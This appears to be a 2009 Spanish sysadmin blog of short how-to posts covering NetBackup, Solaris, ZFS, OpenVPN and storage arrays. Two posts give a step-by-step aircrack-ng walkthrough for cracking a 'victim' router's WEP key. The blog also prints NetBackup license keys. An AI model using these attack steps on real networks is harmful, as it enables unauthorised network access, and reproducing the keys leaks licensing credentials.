martes, 24 de noviembre de 2009

Como solucionar el problema de mediaserver offline



1) La maquina server1 se le expiro la licencia de NB. Se agrego la licencia tanto en el Media server como en el Masterserver, pero la maquina seguia apareciendo como:
server1 654000 OFFLINE

2) Se trato de activar el mediaserver mediante el comando:
#vmoprcmd -activate_host -h server1 //Desde el Master
Pero al generar este comando presento un error en el demonio de VM del media server.

3) Ingrese al media server y active el demonio vmd, y debe quedar asi:


4) Despues de activar el demonio se debe volver a lanzar el comando.

martes, 17 de noviembre de 2009

Como validar el WWN de las hba en un HOST


1. Con el comando #cfgadmin -a
2. Ó en el Switch Brocade puedo encontrar:

jueves, 12 de noviembre de 2009

miércoles, 11 de noviembre de 2009

Como subir o bajar el NOM (Veritas Netbackup Operator Manager)

IMPORTANTE: En el master server se debe encontra activo el demonio "nbsl", para que el NOM se conecte a este y logre gestionar toda la plataforma

1. Ingresamos a la ruta donde se encuentra el demonio que sube todos los servicios del NOM.

root@servidor1 #cd /opt/VRTSnom/bin

2. Miramos el status del demonio.
root@servidor1 #./nom_server status

Veritas NOM processes
---------------------
UID PID PPID C STIME TTY TIME CMD
root 1278 1 0 Oct 02 ? 0:00 /opt/VRTSpbx/bin/pbx_exchange
root 1321 1 0 Oct 02 ? 0:02 /opt/VRTSat/bin/vxatd
root 1526 1 0 Oct 02 ? 515:34 ./NOM_dbsrv -o /opt/VRTSnom/logs/nomdbsrv.log @/opt/VRTSnom/var/global/nomserve
root 1616 1 0 Oct 02 ? 3296:20 /opt/VRTSnom/bin/VRTSnomd -Xmx512m -classpath /opt/VRTSjre/jre1.5/lib/tools.jar
root 1719 1 0 Oct 02 ? 5687:45 /opt/VRTSjre/jre1.5/bin/java -Dvrtsat.libpath=/opt/VRTSat/lib -Dvrtsweb.home=/o

3. Detenemos el servicio
root@servidor1 # ./nom_server stop
Stopping Veritas NOM Web Server
Web application "nom" shutdown successfully
Stopping Veritas NOM Server
Stopping VRTSnomd (15) ...
stopping the NOM Database Server
Adaptive Server Anywhere Stop Engine Utility Version 9.0.2.3323

4. Iniciamos nuevamente el servicio

root@servidor1 # ./nom_server start
Starting Veritas NOM Server
Starting NOM database
NOM Database Server started (pid 3060)
The following users have been Authorized for access in PBX:
Auth User:0 : root
starting VRTSnomd...
VRTSnomd started, pid = 3099
Starting Veritas NOM Web Server
Starting the web server.....done.
Web Application "nom" started successfully

Veritas NOM processes
---------------------
UID PID PPID C STIME TTY TIME CMD
root 1278 1 0 Oct 02 ? 0:00 /opt/VRTSpbx/bin/pbx_exchange
root 1321 1 0 Oct 02 ? 0:03 /opt/VRTSat/bin/vxatd
root 3060 1 0 10:56:29 ? 0:18 ./NOM_dbsrv -o /opt/VRTSnom/logs/nomdbsrv.log @/opt/VRTSnom/var/global/nomserve
root 3099 1 8 10:56:38 pts/2 0:30 /opt/VRTSnom/bin/VRTSnomd -Xmx512m -classpath /opt/VRTSjre/jre1.5/lib/tools.jar
root 3162 1 1 10:56:46 pts/2 0:55 /opt/VRTSjre/jre1.5/bin/java -Dvrtsat.libpath=/opt/VRTSat/lib -Dvrtsweb.home=/o

Como Montar un ISO en Solaris

1. Primero debemos montar el iso y que quede como unidad virtual.

lofiadm -a /image/NBU65/dvd2/NBU65_DVD2.iso

2. Ahora montamos la unidad virtual en una ruta fisica
mount -F hsfs -o ro /dev/lofi/1 /mnt/dvd2/

3. Ahora podemos ingresar al directorio donde quedo montado el dispositivo virtual.
cd /mnt/dvd2

Lo anterior solamente era para que se pueda ver sobre la maquina que tengo el iso. Ahora tengo que compartirlo por NFS para que cualquier maquina lo pueda utilizar. Para ello hacemos lo siguiente:

4. Configurarmos el file system para que pueda ser accedido via NFS:
share -F nfs -o ro /mnt/dvd2/

5. Validamos que si realmente se este compartiendo:
share

RESOURCE SERVER ACCESS TRANSPORT
masterserver2:/backup masterserver2 - -
masterserver2:/backup_proxy masterserver2 - -
masterserver2:/bkOracle masterserver2 - -
masterserver2:/image masterserver2 - -
masterserver2:/pva masterserver2 - -
masterserver2:/export/srt/Solaris_10 masterserver2 - -
masterserver2:/mnt/dvd2 masterserver2 - -

En este momento vemos que si se esta compartiendo por NFS el file system /mnt/dvd2.

Ahora vamos a la maquina cliente donde queremos hacer uso de ese file system compartido (ej: masterserver1).

6. Encontrandonos dentro de la maquina cliente montamos el nfs que se encuentra en masterserver2 asi:
mount -F nfs -o ro masterserver2:/mnt/dvd2 /mnt/dvd2

Teniendo en cuenta que anteriormente debimos haber creado el file system /mnt/dvd2 en la maquina cliente.

7. Listo ya podemos utilizar la informacion que se encuentra actualmente montada sobre masterserver2.

martes, 10 de noviembre de 2009

Instalacion y configuracion OpenVpn Opensolaris

Como Instalar OpenVPN en OpenSolaris x86 b79 32/64 bits

Este es el proceso empleado para instalar openvpn OpenSolaris 11.06

Primero debemos instalar las dependencias:

pkg install SUNWgcc


Descargar las fuentes de tun/tap.

cd /usr/local/src
wget http://www.whiteboard.ne.jp/~admin2/tuntap/source/tuntap/tuntap.tar.gz
tar xvfz tuntap.tar.gz
chown -R root:root tuntap
cd tuntap

Cambiar la configuracion del Makefile.in

LDFLAGS = -melf_x86_64
...
modules: tun.o tap.o
$(LD) $(LDFLAGS) -r -o tun tun.o
$(LD) $(LDFLAGS) -r -o tap tap.o


./configure
make

Configurar tun.

# devfsadm –i tun


Validar los mensajes del syslog.

#dmesg

Instalar LZO para compresion en Tiempo Real:

# wget http://www.oberhumer.com/opensource/lzo/download/lzo-2.03.tar.gz

# gzcat lzo-2.03.tar.gz | tar xvf lzo-2.03.tar.gz

# gzcat lzo-2.03.tar.gz | tar xvf -

# cd lzo-2.03

# ./configure

# make

# make install



Instalar OpenVPN.

wget http://openvpn.net/release/openvpn-2.0.9.tar.gz

# gzcat openvpn-2.0.9.tar.gz | tar xvf –

# cd openvpn-2.0.9

##### ./configure --disable-lzo # Para deshabilitar compresion de lzo

# ./configure --with-lzo-lib=/usr/local/lib

# make

# make install

Crear un archivo de start/stop para subir el servicio automaticamente:

#!/bin/bash
case "$1" in
'start')
echo "Starting Openvpn"
nohup /usr/local/sbin/openvpn --config /etc/openvpn/pegasus.conf --writepid /var/run/openvpnd.pid &
;;

'stop')
echo "Stoping Openvpn"
if [ -f /var/run/openvpnd.pid ]; then
PID=`cat /var/run/openvpnd.pid`
kill -9 $PID
ifconfig tun0 unplumb
fi
;;

*)
echo "Usage: $0 { stop | start }"
exit 1
;;
esac

Crear el archivo de configuracion similiar a:

client
dev tun
# tun-mtu 1500
tun-mtu 1434
proto udp
#remote 201.228.144.5 1194
remote 10.201.136.36 1194

ca /etc/openvpn/ca.crt
cert /etc/openvpn/pegasus.crt
key /etc/openvpn/pegasus.key
ping 30
ping-exit 66
verb 6
mute 20
comp-lzo

viernes, 6 de noviembre de 2009

Aderir una nueva licencia de NB para un cliente

//En el archivo de licencias buscamos la siguiente parte de texto:

NetBackup Eval Keys Hard End Date of 12/31/2009

NetBackup 6.5 Evaluation License (posted 10/22/09)

NetBackup Server,Cross Platform,Enterprise Server,v6.5, 60-Day Evaluation License

OENN-2WDG-TV2N-XPRO-6OCU-8LGK-HM77-HHHP-PP36 //Esta es la licencia

//Ahora aplicamos la licencia estando sobre la maquina: (Ejemplo sg-des-ccol10-bck)
#/usr/openv/netbackup/bin/admincmd/get_license_key


License Key Utility
-------------------

A) Add a License Key
D) Delete a License Key
F) List Active License Keys
L) List Registered License Keys
H) Help
q) Quit License Key Utility


Enter a letter: A

Enter license key: OENN-2WDG-TV2N-XPRO-6OCU-8LGK-HM77-HHHP-PP36

OENN-2WDG-TV2N-XPRO-6OCU-8LGK-HM77-HHHP-PP36:
Evaluation NetBackup Enterprise Server Base product with the following features enabled:
PureDisk Remote Office
PureDisk Option
SAN Client
PureDisk MS Exchange Agent
Enterprise Vault Agent
PureDisk MS SQL Server Agent
Flexible Disk Option
OpenStorage Disk Option
NAS SnapVault Option
Virtual Tape Option
Bare Metal Restore
Encryption
Open File Backup
Remote Client Support
Robotic Library Sharing Support
Remote Media Server Support
Microsoft RSM Robotic Libraries
ADIC DAS/SDLC Robotic Libraries
IBM ATL Robotic Libraries
Fujitsu LMF Robotic Libraries
StorageTek ACS Robotic Libraries
Snapshot Client
MS SharePoint Agent
Inline Tape Copy
Vault
Snapshot Client
GDM Managed Server
Library Based Tape Drives
Additional Drives/Robotics
DataStore
Encryption (Legacy DES 56-bit)
Encryption (Legacy DES 40-bit)
SAP extension
SQL-Backtrack extension
Sybase extension
Informix extension
Oracle extension
Lotus Notes extension
DB2 extension
MS SQL Server extension
MS Exchange extension
Advanced Reporting Option
Shared Storage Option
Global Data Manager
NDMP
EMC
Additional clients
has been registered.



License Key Utility
-------------------

A) Add a License Key
D) Delete a License Key
F) List Active License Keys
L) List Registered License Keys
H) Help
q) Quit License Key Utility


Enter a letter: Q
#

miércoles, 4 de noviembre de 2009

Como validar la licencia de NB instalada en un cliente?

#cd /usr/openv/netbackup/bin/admincmd/
#./bpminlicense -verbose
OENR-9DSF-GEVB-P6C4-PZX6-OG9S-E777-GGEP-PP8P OHN6-PRDN-P3ZO-PD2O-SFGU-N3Z3-WBNK-SO7Y-777S-S6P
file version = 0x05000000
time added = 0x4a9fd672 Thu Sep 03 09:45:06 2009
hostname = sg-des-ccol10-bck
product ID = 6 NetBackup Enterprise Server
serial number = 0
key version = 0x05000000
count = 0
server platform = 0 Any platform
client platform = 0 Any platform
server tier = 10 NetBackup Enterprise Server
client tier = 0 No tier
license type = 0 Time limited demonstration
Site ID = 4095 Unknown site: 4095
Expiration = Expired Tue Nov 03 00:00:00 2009 ///OJO: EXPIRO LA LICENCIA!!!!
Firm Expiration = Not expired Mon Nov 30 00:00:00 2009
Feature ID = 86 PureDisk Remote Office -
Feature ID = 85 PureDisk Option -
Feature ID = 84 SAN Client -
Feature ID = 83 PureDisk MS Exchange Agent -
Feature ID = 81 Enterprise Vault Agent -
Feature ID = 80 PureDisk MS SQL Server Agent -

miércoles, 7 de octubre de 2009

Validar volumenes en zfs - desmontarlo y destruirlo

zpool -h //Muestra los parametros que acompañan al comando zpool

root@masterserver2 # zpool list //Lista los pool zfs actualmente creados
NAME SIZE USED AVAIL CAP HEALTH ALTROOT
backup_pva 3.17T 325M 3.17T 0% ONLINE -
storage0 527G 142G 385G 26% ONLINE -


root@masterserver2 # zpool status backup_pva //Lista los discos que se encuentran atachados al un pool zfs Ej: backup_pva
pool: storage0
state: ONLINE
scrub: none requested
config:

NAME STATE READ WRITE CKSUM
backup_pva ONLINE 0 0 0
c3t600A0B800011EF78000079F34832C463d0s0 ONLINE 0 0 0
c3t600A0B800011EE120000A45C4958A7D8d0s2 ONLINE 0 0 0
c3t600A0B800011EE120000A577496DE26Ad0s0 ONLINE 0 0 0

zfs unmount -f backup_pva/pva //Desmontamos el volumen fisico zfs

zfs destroy -r backup_pva //Destruimos el volumen zfs

zpool destroy -r backup_pva //Destruimos el Pool zfs

viernes, 4 de septiembre de 2009

Como generar reporte de status (alarmas, estadisticas) del arreglo 6540

//Primero nos logueamos en la maquina que contiene el CAM:
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX

//Identificamos cual array es al que queremos generar el reporte: escogemos el stk6540-01
root@masterserver # sscs list array
Array: arregloremoto-stk6140-01
Array: arreglolocal-stk6140-01
Array: stk6540-01
Array: ARRAY01
Array: ARRAY02

//Aplicamos el siguiente comando:
root@masterserver # /opt/SUNWsefms/bin/supportData -d stk6540-01 -p /export/home/usuario -o supporData_stk6540-01
Starting the collection process for stk6540-01
Starting data collection
Collecting the array profile...
Collecting the MEL data...
Collecting the RLS data...
Collecting persistant registrations...
Collecting bad block data...
Collecting the drive log data...
Collecting the object bundle...
Collecting the alarm data...
Collecting the state capture...
Collecting the NVSRAM data...
Collecting the volume statistics...
Collecting the SOC data...
Zipping up the data files
Completion Status: Task completed succesfully.

La siguiente es la sintaxis de comando:
//The "supportData" utility is in the directory /opt/SUNWsefms/bin/
//The syntax to run the "supportData" utility is :
//
//supportData -d -p -o
//
//Valid identifiers are the or or or
//
//where :
//
// is the internal Array Serial Number
// is the Name of the Array assigned in Configuration Service
// is the ip address of either the A or B controller
// is the fully qualified DNS name of either the A or B controller or the management host
//
//and :
//
// is the location where you want the output written, e.g. /tmp
// is the output file to be created.
//
//The output file will be in a zip format.

miércoles, 2 de septiembre de 2009

CLI - Reporte volumenes array 6540

//Primero logearse en la maquina bksrv01
root@masterserver # sscs login -u root -h 172.XX.XXX.XXX

//Sequimos con el comando que indica con que array queremos trabajar, con cual virtual disk y que nos de una relacion de los volumenes y las caracteristicas del virtual disk.
root@masterserver # sscs list --array stk6540-01 vdisk 1
Virtual Disk: 1
Status: Optimal
State: Ready
Number of Disks: 10
RAID Level: 1
Total Capacity: 681.135 GB
Configured Capacity: 594.000 GB
Available Capacity: 87.135 GB
Array Name: stk6540-01
Array Type: 6540
Disk Type: Fibre Channel
Maximal Volume Size: 3.129 GB
Associated Disks:
Disk: t0d05
Disk: t0d04
Disk: t0d03
Disk: t0d02
Disk: t0d01
Disk: t1d01
Disk: t1d02
Disk: t1d03
Disk: t1d04
Disk: t1d05
Associated Volumes:
Volume: heo_01_v4901_ora_datos
Volume: heo_01_v4901_ora_indices
Volume: heo_01_v4902
Volume: heo_01_v4902_ora_datos
Volume: heo_01_v4904
Volume: stk5320-01-H0_ndmp
Volume: stk5320-01-H1_ndmp

viernes, 31 de julio de 2009

Creación de Zonas - Solaris

create -b
set zonepath=/zonas/CT1BOZSUNOAS-SPE4
set autoboot=true
set ip-type=exclusive

add net
set physical=nxge1
set physical=nxge2
end

verify
commit

miércoles, 29 de julio de 2009

Como hackear clave WEP en red inalambrica - Wifislax

1.Descargar el cd de wifislax 3.1 desde http://download.wifislax.com:8080/wifislax-3.1.iso. Boot el equipo por cd. En el momento que ya haya terminado de cargar el OS, para cargar el escritorio grafico, colocar como login "root" y password "toor", y finalmente "startx". Seguidamente se debe configurar la interfaz de red como monitor sobre el canal en el que se encuentre el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng.

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2.#iwconfig , para revisar la configuracion en la que quedo la interfaz de red en este caso la interfaz de red se llama wifi0.

3.Configuramos la velocidad de transmision a 1MB para evitar problemas de transmision


#iwconfig wifi0 rate 1M


4.Despues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar redes por el canal 6. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0


donde aaaa puede ser cualquier archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax


En este ejemploencontramos una ESSID: LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6


5.Seguidamente despues de haber escogido la red con encriptacion wep que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida


6.Ahora empezaremmos a inyectar paquetes usando el siguiente comando:


#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.

7.Logrando la cantidad de paquetes indicado procedemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap


Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz.

Este comando me entregara la clave tanto en exadecimal como en su equivalente ASCII:

….

Equivalente en ASCII: LADINO4763356

Como hackear clave WEP en red inalambrica - Wifislax

1. Configurar la interfaz de red en modo "Monitor" sobre el canal en el que se encuentra el ESSID.

wifislax->Asistencia chipset->Asistencia Intel pro wireless-> Cargar ipw3945 inyeccion – ipwraw-ng

NOTA: con este comando configuramos tambien la interfas en modo monitor

#airmon-ng start wifi0 6

2. #iwconfig, para revisar la configuracion en la que quedó la interfaz de red, en este caso la interfaz de red se llama wifi0.

3. Configuramos la velocidad de transmisión a 1MB para evitar problemas de transmisión.

#iwconfig wifi0 rate 1M

4. Desues de haber identificado que la interfaz halla quedado en modo monitor, empezaremos a detectar las redes que se encuentren en el canal 6 por el cual nuestra interfaz esta escuchando. Para esto utilizamos el siguiente comando:

#airodump-ng -w aaaa -c6 wifi0

donde aaaa puede ser cualquier nombre para este archivo.


NOTA: tambien se puede hacer de la siguiente manera:

wifislax-> Herramientas wireless -> Kismet .

Seguidamente aparecera una ventana (Lanzador kismet) para configurar cual es la interfaz de red:

Dispositivo: wifi0

Driver: ipw2915

Nombre: wifislax

En este ejemplo encontramos una ESSID:LD, BSSID: 00:24:01:24:AD:FF, ENCHRIPTER: WEB, CHANNEL: 6

5. Seguidamente despues de haber escogido la red con encriptacino WEP que vamos a atacar, ejecutamos el siguiente comando:

#aireplay -1 0 -e ESSID -a MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay -1 0 -e LD -a 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0


En este paso nuestra maquina tiene que engancharse con el router victima, apareciendo el siguiente mensaje despues de haber dado enter en el comando mensionado:

…...

Enviando peticion de autentificacion

Autentificacion conseguida

Enviando peticion de asociacion

Asociacion conseguida

6. Ahora empezaremos a intectar paquetes usando el siguiente comando:

#aireplay-ng -3 -x600 -b MAC_ROUTER_VICTIMA - h MAC_DE_MI_TARJETA wifi0

#aireplay-ng -3 -x600 -b 00:24:01:24:AD:FF - h 00:1B:77:DA:99:3B wifi0

Ahora se comenzaran a enviar paquetes. Debemos esperar a que se envien un poco mas de 100.000 paquetes.


7. Logrando la cantidad de paquetes indicado procederemos a encontrar la clave. Para esto haremos uso del siguiente comando:

#aircrack-ptw LD-01.cap

Este archivo se genera automaticamente con el nombre del ESSID en el directorio raiz. Este comando me entrega la clave tanto en exadecimal como en su equivalente ASCII.

.....

Equivalente en ASCII: LADINO4763356



Congratulations!!! Clave detectada!!!

lunes, 27 de julio de 2009

Configuracion Interfaz BMC Sun Blade 6250

//Este es un ejemplo aplicado a la BL9 del chasis 1

-> set /CH/BL9/SP/network pendingipaddress=172.28.236.29
-> set /CH/BL9/SP/network pendingipdiscovery=static
-> set /CH/BL9/SP/network pendingipgateway=172.28.239.254
-> set /CH/BL9/SP/network pendingipnetmask=255.255.252.0
-> set /CH/BL9/SP/network commitpending=true

//Muestra la configuracion de Red para esa blade
-> show /CH/BL9/SP/network

viernes, 10 de julio de 2009

Agregar rutas estaticas - Solaris

//Para ver las rutas estaticas actualmente fijadas en la maquina se ejecuta el siguiente comando

# netstat -rn

Routing Table: IPv4
Destination Gateway Flags Ref Use Interface
-------------------- -------------------- ----- ----- ------ ---------
172.28.250.98 172.28.250.98 UGH 1 0
172.28.250.99 172.28.250.99 UGH 1 0
172.28.250.97 172.28.250.97 UGH 1 481
172.28.250.100 172.28.250.100 UGH 1 272
172.28.250.101 172.28.250.101 UGH 1 3
172.20.45.231 172.20.45.231 UGH 1 0
172.20.45.230 172.20.45.230 UGH 1 0
192.168.100.0 192.168.100.1 U 1 0 bge853000:1
140.126.65.0 140.126.65.1 U 1 0 bge45000:1
172.16.150.0 172.28.249.254 UG 1 3
172.20.45.0 172.20.45.14 U 1 30197 bge45000:2
172.20.45.0 172.20.45.14 U 1 0 bge45000
172.20.45.0 172.20.45.14 U 1 6692 bge45001
172.28.248.0 172.28.250.94 U 1 198287 bge853000:2
172.28.248.0 172.28.250.94 U 1 0 bge853000
172.28.248.0 172.28.250.94 U 1 10591 bge853001
172.28.0.0 172.28.251.254 UG 1 12905
224.0.0.0 172.28.250.94 U 1 0 bge853000:2
default 172.20.45.250 UG 1 5985
127.0.0.1 127.0.0.1 UH 7626145638 lo0

//Agregando una ruta para acceder a una red
# route add net 192.168.16.0 10.0.2.15 //Para acceder a la red 192.168.16.0, lo voy a hacer desde la gateway 10.0.2.15

//Removiendo una ruta para acceder a una red
# route delete net 192.168.16.0 10.0.2.15

viernes, 3 de julio de 2009

Como Agregar tamaño a la Swap - Solaris

#mkfile 2g /opt/swapfile //Estamos creando un archivo de tamaño 2GB llamado swapfile

#swap -a /opt/swapfile //Con esto estoy habilitando el archivo creado para que se adhiera a la swap actual